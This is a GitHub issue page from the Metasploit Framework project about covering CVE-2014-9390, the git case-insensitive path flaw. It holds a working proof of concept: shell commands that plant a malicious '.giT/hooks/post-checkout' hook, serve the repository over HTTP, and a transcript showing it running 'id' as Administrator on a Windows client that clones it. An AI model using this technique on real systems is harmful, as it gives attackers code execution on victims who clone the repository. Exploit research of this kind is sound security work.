New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add coverage for git case-insensitive vulnerability (CVE-2014-9390) #4435

Closed
jhart-r7 opened this Issue Dec 19, 2014 · 1 comment

Comments

Projects
None yet
2 participants
@jhart-r7
Contributor

jhart-r7 commented Dec 19, 2014

cd /tmp
REPO=`mktemp -d`
git init $REPO
cd $REPO
mkdir -p .giT/hooks
echo -ne "#\!/bin/sh\r\nid > /tmp/id" > .giT/hooks/post-checkout
chmod 755 .giT/hooks/post-checkout
git add .
git commit -m "test" -a
git update-server-info
ruby -run -e httpd -- -p 8080  $REPO/.git

Then clone http://yourhost:8080:

Administrator@win7-git ~
$ rm -f /tmp/id && rm -Rf bad && /cygdrive/c/Program\ Files\ \(x86\)/Git/bin/git clone http://localhost:8080/ bad && cat /tmp/id
Cloning into 'bad'...
uid=500(Administrator) gid=544(Administrators) groups=544(Administrators)

jhart-r7 added a commit to jhart-r7/metasploit-framework that referenced this issue Dec 19, 2014

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7
Contributor

todb-r7 commented Dec 21, 2014

@todb-r7 todb-r7 changed the title from Add coverage for git CVE-2014-9390 to Add coverage for git case-insensitive vulnerability (CVE-2014-9390) Dec 22, 2014

@todb-r7 todb-r7 closed this in #4440 Jan 1, 2015

todb-r7 added a commit that referenced this issue Jan 1, 2015

Land #4440, git client exploit from @jhart-r7
Also fixes #4435 and makes progress against #4445.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment